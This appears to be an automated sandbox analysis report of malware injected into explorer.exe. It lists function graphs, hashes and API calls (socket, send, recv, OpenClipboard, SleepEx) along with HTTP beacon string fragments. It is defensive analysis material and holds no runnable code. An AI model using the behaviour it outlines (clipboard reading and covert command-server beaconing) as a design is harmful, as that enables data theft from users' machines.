                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                Signature Coverage:20.2%
                                                                                                                                                                                                                                                                                                Total number of Nodes:104
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:9
                                                                                                                                                                                                                                                                                                execution_graph 8563 598aed9 8564 598af44 socket 8563->8564 8565 598af1c 8563->8565 8565->8564 8558 598d4ab 8559 598d4ae 8558->8559 8560 598e4f2 9 API calls 8559->8560 8561 598d561 SleepEx 8559->8561 8562 598d578 8559->8562 8560->8559 8561->8559 8535 5989fae 8536 5989ff7 8535->8536 8541 5989e62 8536->8541 8538 598a13d 8545 598af72 8538->8545 8540 598ab88 8542 5989e8e 8541->8542 8543 5989472 ObtainUserAgentString 8542->8543 8544 5989e9b 8543->8544 8544->8538 8546 598af8d 8545->8546 8547 598afd5 WSAStartup 8546->8547 8547->8540 8548 59863ee 8550 59863f3 8548->8550 8549 59864a9 8550->8549 8551 598e4f2 9 API calls 8550->8551 8551->8549 8566 59882e1 8567 59882f4 8566->8567 8574 5989fb2 8567->8574 8570 59863f2 9 API calls 8572 5988304 8570->8572 8571 5988380 8572->8571 8580 59864e2 8572->8580 8575 5989ff7 8574->8575 8576 5989e62 ObtainUserAgentString 8575->8576 8577 598a13d 8576->8577 8578 598af72 WSAStartup 8577->8578 8579 59882fc 8578->8579 8579->8570 8581 5986587 8580->8581 8582 59864ff 8580->8582 8581->8572 8582->8581 8583 5987e22 OpenClipboard 8582->8583 8584 5986577 8583->8584 8585 598d4b2 10 API calls 8584->8585 8586 598657f 8585->8586 8587 59863f2 9 API calls 8586->8587 8587->8581 8467 5986592 8471 59865b3 8467->8471 8468 5986678 8469 59865e2 SleepEx 8469->8469 8469->8471 8471->8468 8471->8469 8474 5987e22 8471->8474 8478 598d4b2 8471->8478 8483 59863f2 8471->8483 8475 5987e3b 8474->8475 8477 5987e7f 8474->8477 8476 5987e77 OpenClipboard 8475->8476 8475->8477 8476->8477 8477->8471 8480 598d4e9 8478->8480 8479 598d578 8479->8471 8480->8479 8482 598d561 SleepEx 8480->8482 8487 598e4f2 8480->8487 8482->8480 8484 59864a9 8483->8484 8485 598640b 8483->8485 8484->8471 8486 598e4f2 9 API calls 8485->8486 8486->8484 8489 598e525 8487->8489 8488 598eba0 8488->8480 8489->8488 8492 598e5f1 8489->8492 8508 598aee2 8489->8508 8491 598e6bd 8491->8488 8495 598e748 8491->8495 8511 598b082 8491->8511 8492->8488 8492->8491 8494 598e693 getaddrinfo 8492->8494 8494->8491 8495->8488 8496 598eb6d 8495->8496 8507 598ecc0 8495->8507 8517 598b112 8496->8517 8498 598ed39 8501 598ed5a SleepEx 8498->8501 8502 598ed66 8498->8502 8500 598ee8f 8503 598b112 closesocket 8500->8503 8501->8500 8502->8500 8504 598edeb setsockopt recv 8502->8504 8503->8488 8504->8500 8505 598ee4e 8504->8505 8505->8500 8506 598ee57 recv 8505->8506 8506->8500 8506->8505 8514 598aff2 8507->8514 8509 598af1c 8508->8509 8510 598af44 socket 8508->8510 8509->8510 8510->8492 8512 598b0ba 8511->8512 8513 598b0e2 connect 8511->8513 8512->8513 8513->8495 8515 598b04f send 8514->8515 8516 598b027 8514->8516 8515->8498 8516->8515 8518 598b16e closesocket 8517->8518 8519 598b144 8517->8519 8518->8488 8519->8518 8523 5986692 8524 59866a9 8523->8524 8525 59866f9 8524->8525 8526 59866d3 CreateThread 8524->8526 8527 5989e62 8528 5989e8e 8527->8528 8531 5989472 8528->8531 8530 5989e9b 8533 59894e4 8531->8533 8532 598955f 8532->8530 8533->8532 8534 598954e ObtainUserAgentString 8533->8534 8534->8532 8552 598b106 8554 598b113 8552->8554 8553 598b16e closesocket 8554->8553 8555 598af66 8556 598af7d 8555->8556 8557 598afd5 WSAStartup 8556->8557

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 0598E4F2 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 829networkCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 0 598e4f2-598e523 1 598e543-598e546 0->1 2 598e525-598e529 0->2 3 598e54c-598e552 1->3 4 598ebd1-598ebde 1->4 2->1 5 598e52b-598e52f 2->5 3->4 7 598e558-598e56c 3->7 5->1 6 598e531-598e535 5->6 6->1 8 598e537-598e53b 6->8 9 598e56e-598e572 7->9 10 598e574-598e575 7->10 8->1 11 598e53d-598e541 8->11 9->10 12 598e57f-598e588 9->12 10->12 11->1 11->3 13 598e58a-598e58e 12->13 14 598e59f-598e5a3 12->14 15 598e5ab-598e5d0 13->15 16 598e590-598e59d 13->16 14->15 17 598e5a5 14->17 18 598e5d8-598e5ec call 598aee2 15->18 19 598e5d2-598e5d6 15->19 16->17 17->15 22 598e5f1-598e613 18->22 19->18 21 598e619-598e620 19->21 23 598e6d0-598e6e0 21->23 24 598e626-598e62e 21->24 22->21 25 598ebc1-598ebca 22->25 23->25 26 598e6e6-598e6f6 23->26 27 598e65e-598e671 24->27 28 598e630-598e658 call 5986012 call 598deb2 24->28 25->4 29 598e6f8-598e709 call 598ae72 26->29 30 598e710-598e722 26->30 27->25 32 598e677-598e67d 27->32 28->27 29->30 34 598e788-598e7ad 30->34 35 598e724-598e743 call 598b082 30->35 32->25 37 598e683-598e685 32->37 41 598e7cc-598e7d0 34->41 42 598e7af-598e7ca call 598f342 34->42 44 598e748-598e770 35->44 37->25 43 598e68b-598e68d 37->43 48 598ebb1-598ebb2 41->48 49 598e7d6-598e7da 41->49 58 598e814 call 598f342 42->58 43->25 47 598e693-598e6bb getaddrinfo 43->47 44->34 52 598e772-598e77e 44->52 47->23 54 598e6bd-598e6c5 47->54 51 598ebb9-598ebba 48->51 49->48 50 598e7e0-598e7e4 49->50 55 598e7ec-598e812 call 598f342 50->55 56 598e7e6-598e7ea 50->56 51->25 52->51 57 598e784 52->57 54->23 55->58 56->55 59 598e819-598e8c9 call 598f312 call 598c3a2 call 598c392 * 2 call 598f312 call 598b7d2 call 598f532 56->59 57->34 58->59 77 598e8cb-598e8cf 59->77 78 598e8dd-598e93d call 598f342 59->78 77->78 79 598e8d1-598e8d8 call 598bcd2 77->79 83 598e943-598e982 call 598f312 call 598f7c2 call 598f532 78->83 84 598ea36-598eb23 call 598f312 call 598f7c2 * 4 call 598f532 * 2 call 598c392 * 2 78->84 79->78 97 598e984-598e9a3 call 598f7c2 call 598f532 83->97 98 598e9a7-598e9d8 call 598f7c2 * 2 83->98 116 598eb28-598eb4c call 598f7c2 84->116 97->98 113 598e9da-598e9ff call 598f532 call 598f7c2 98->113 114 598ea04-598ea08 98->114 113->114 114->116 117 598ea0e-598ea31 call 598f7c2 114->117 127 598ebdf-598ecba call 598f7c2 * 7 call 598f532 call 598f312 call 598f532 call 598b7d2 call 598bcd2 116->127 128 598eb52-598eb67 call 598f7c2 call 598f532 116->128 117->116 140 598eb6d-598ebaa call 598ad12 call 598b112 127->140 188 598ecc0-598ecc7 127->188 128->140 141 598ed0f-598ed3b call 598aff2 128->141 140->48 151 598ed3d-598ed52 141->151 152 598ed66-598ed6a 141->152 151->152 157 598ed54-598ed58 151->157 153 598ed6c-598ed70 152->153 154 598ed7e-598ed92 152->154 158 598eea6-598eee2 call 598b112 153->158 159 598ed76-598ed78 153->159 160 598edb0-598ee4c call 598f342 call 598f312 setsockopt recv 154->160 161 598ed94-598edaa 154->161 157->152 163 598ed5a-598ed61 SleepEx 157->163 158->48 159->154 159->158 175 598ee4e 160->175 176 598ee8f-598ee9c 160->176 161->158 161->160 163->158 175->176 178 598ee50-598ee55 175->178 176->158 178->176 180 598ee57-598ee8d recv 178->180 180->175 180->176 189 598ecc9-598ecd0 188->189 190 598ecf1-598ecfc 188->190 191 598ece8-598ecef 189->191 192 598ecd2-598ecde 189->192 190->141 193 598ecfe-598ed09 190->193 191->190 194 598ed0b-598ed0c 191->194 192->191 193->141 194->141
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: recv$Sleepgetaddrinfosetsockopt
                                                                                                                                                                                                                                                                                                • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                                                                                                                • API String ID: 878647675-2045366144
                                                                                                                                                                                                                                                                                                • Opcode ID: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
                                                                                                                                                                                                                                                                                                • Instruction ID: 3e4b626397c29b42fcaaef1665dbb2473643b36691e749923c6078c533ff43e8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3527330218A088BDB69FF28D498BFAB3E5FB94304F54462ED49BD7146EF34A54AC741
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 05987E22 Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 329 5987e22-5987e35 330 5987e3b-5987e43 329->330 331 5987ec4-5987ec9 329->331 330->331 332 5987e45-5987e4d 330->332 332->331 333 5987e4f-5987e57 332->333 333->331 334 5987e59-5987e61 333->334 334->331 335 5987e63-5987e6b 334->335 335->331 336 5987e6d-5987e75 335->336 336->331 337 5987e77-5987e7d OpenClipboard 336->337 337->331 338 5987e7f-5987e95 337->338 340 5987eb9-5987ec0 338->340 341 5987e97-5987ea3 338->341 340->331 341->340 344 5987ea5-5987eb1 call 5987c02 341->344 344->340
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClipboardOpen
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2793039342-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b0e5e616c801f2336d771a64bde91011fd3322707a33e0b2c0e596f2f8920cf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C1112341289098FDB99BBA880CD7B576E5FB99305F6804B9940BCB1E2DB37CD82C711
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 05989472 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,05989E9B), ref: 05989559
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AgentObtainStringUser
                                                                                                                                                                                                                                                                                                • String ID: -Age$User$nt: $on.d$urlm
                                                                                                                                                                                                                                                                                                • API String ID: 2681117516-1987325725
                                                                                                                                                                                                                                                                                                • Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                                                                                                                                                                                                                                                • Instruction ID: e7992c25397b62d10d77796848937a10d64a5e0419ad11d0e3b675c8970cee3f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B031B131B14A4C8BCB04FFA8D8886FEB7E1FF98204F40422AD45ED7240EF7896498795
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598B106 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 215 598b106-598b111 216 598b15b-598b160 215->216 217 598b113-598b142 215->217 220 598b167-598b168 216->220 221 598b162 call 598deb2 216->221 218 598b16e-598b181 closesocket 217->218 219 598b144-598b162 call 598deb2 217->219 219->220 220->218 221->220
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: closesocket
                                                                                                                                                                                                                                                                                                • String ID: clos$esoc$ket
                                                                                                                                                                                                                                                                                                • API String ID: 2781271927-3604069445
                                                                                                                                                                                                                                                                                                • Opcode ID: 689451a6646ce39e451173c0dcf4c8f5c29d37e37dab8c7ddbdf120933efa901
                                                                                                                                                                                                                                                                                                • Instruction ID: c27a505ad9c2b4cfb0183c360690678bbb80b707dcd175d1587871993d6b6a91
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 689451a6646ce39e451173c0dcf4c8f5c29d37e37dab8c7ddbdf120933efa901
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A01F2B150CB488FCB40EF28E0887A97BE0FB85300F58466DE99ECB246D73498468B06
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598B112 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 223 598b112-598b142 224 598b16e-598b181 closesocket 223->224 225 598b144-598b168 call 598deb2 223->225 225->224
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: closesocket
                                                                                                                                                                                                                                                                                                • String ID: clos$esoc$ket
                                                                                                                                                                                                                                                                                                • API String ID: 2781271927-3604069445
                                                                                                                                                                                                                                                                                                • Opcode ID: d421c9c6720000eb262619b817ed4860d3db7c06d4e9d6bd0b1ff8f44343a4ef
                                                                                                                                                                                                                                                                                                • Instruction ID: 08084db4f617f7de259793ef65bf169dd2d2d0ae527443855fa3401918e30504
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d421c9c6720000eb262619b817ed4860d3db7c06d4e9d6bd0b1ff8f44343a4ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECF06DB050CB088FCB80EF28E0C8769B7E1FB88310F54567DA94ECB244C77494428706
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598B082 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53networkCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 228 598b082-598b0b8 229 598b0ba-598b0dc call 598deb2 228->229 230 598b0e2-598b105 connect 228->230 229->230
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: connect
                                                                                                                                                                                                                                                                                                • String ID: conn$ect
                                                                                                                                                                                                                                                                                                • API String ID: 1959786783-716201944
                                                                                                                                                                                                                                                                                                • Opcode ID: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
                                                                                                                                                                                                                                                                                                • Instruction ID: 7bfeeb06af93a23cb41ad687d6e585a19d20095190e76456b02f0ee85a8b85ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7014470518A0C8FCB84EF5CE088B547BE1FB58311F1541BEDA0DDB266C7B4D9818B85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598AF66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48networkCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 233 598af66-598af7b 234 598af8d-598afab 233->234 235 598af7d-598af8b 233->235 236 598afad-598afcf call 598deb2 234->236 237 598afd5-598aff0 WSAStartup 234->237 235->234 236->237
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                                                                                • String ID: WSAS$tart
                                                                                                                                                                                                                                                                                                • API String ID: 724789610-2426239465
                                                                                                                                                                                                                                                                                                • Opcode ID: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b64504789f72e25c56f6e8a7c555e305f945fd2d4cbac24f5de2a9597b3a9b6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9101B1B10196048FCB41FF28D08CBA9BBE0FF58365F2441E9E50ADF265D3B489898756
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598AF72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45networkCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 240 598af72-598afab 242 598afad-598afcf call 598deb2 240->242 243 598afd5-598aff0 WSAStartup 240->243 242->243
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                                                                                • String ID: WSAS$tart
                                                                                                                                                                                                                                                                                                • API String ID: 724789610-2426239465
                                                                                                                                                                                                                                                                                                • Opcode ID: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
                                                                                                                                                                                                                                                                                                • Instruction ID: 7973e9ceb970e7cad1d614d21efa2db51d9fa481265cad411378a454ba248611
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0018F71508A088FCB40EF1CD08CB69BBE0FB58352F2581E9E50DDB265C3B48A858796
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 05986592 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 246 5986592-59865d6 call 5986012 call 598deb2 251 5986678-598668c 246->251 252 59865dc-59865de 246->252 253 59865e2-59865f3 SleepEx 252->253 253->253 254 59865f5-5986607 253->254 255 5986609-598660f 254->255 256 598663d-5986643 254->256 255->256 257 5986611-5986626 call 5987002 255->257 256->253 258 5986645-598664b 256->258 257->256 263 5986628-5986638 call 5986a42 257->263 258->253 260 598664d-5986653 258->260 260->253 262 5986655-5986666 call 5987e22 call 598d4b2 260->262 268 598666b-5986673 call 59863f2 262->268 263->256 268->253
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID: K;y&
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-1772047635
                                                                                                                                                                                                                                                                                                • Opcode ID: fc810b80b542b816e3aa10076e14871e57494e43f3077854b27e7c2e52254b32
                                                                                                                                                                                                                                                                                                • Instruction ID: b91e4a0ffac6e8f69c6e64841a7547ede6b41bf217df993a2a965e16480711a2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc810b80b542b816e3aa10076e14871e57494e43f3077854b27e7c2e52254b32
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38213D34618A4C8FCF54FF68D0D86B9B3A5FBA4200F58066E995ACF24ADB74A440CB51
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598AFF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 271 598aff2-598b025 272 598b04f-598b077 send 271->272 273 598b027-598b049 call 598deb2 271->273 273->272
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: send
                                                                                                                                                                                                                                                                                                • String ID: send
                                                                                                                                                                                                                                                                                                • API String ID: 2809346765-2809346765
                                                                                                                                                                                                                                                                                                • Opcode ID: ad2f236766122beffabcd4b5b327f90ff22d20bd1524373b1c646cf2a1e7c532
                                                                                                                                                                                                                                                                                                • Instruction ID: 4c76e00a4ac1c38c5e86cc2afc7c00fee82635f0356f62605493f5ed88efc68a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad2f236766122beffabcd4b5b327f90ff22d20bd1524373b1c646cf2a1e7c532
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F015270618A0C8FCB94EF1CE048B2577E1FB58314F0545AE995DDB266C774D8818B85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598AED9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 276 598aed9-598af1a 277 598af1c-598af3e call 598deb2 276->277 278 598af44-598af65 socket 276->278 277->278
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: socket
                                                                                                                                                                                                                                                                                                • String ID: sock
                                                                                                                                                                                                                                                                                                • API String ID: 98920635-2415254727
                                                                                                                                                                                                                                                                                                • Opcode ID: 058ccfd56d24ceccc8dc1cea945d912323acad01842a6f445d4708d9ecda25b1
                                                                                                                                                                                                                                                                                                • Instruction ID: 04f6c97a512314c7e36ba1044aaa6a38f80a45e2229a71dad6e289fad56b06cd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 058ccfd56d24ceccc8dc1cea945d912323acad01842a6f445d4708d9ecda25b1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 070192715186188FCB44EF1CD088B50BBE0FB58321F1A81BDDA4DDB262C3B4D985CB85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598AEE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51networkCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
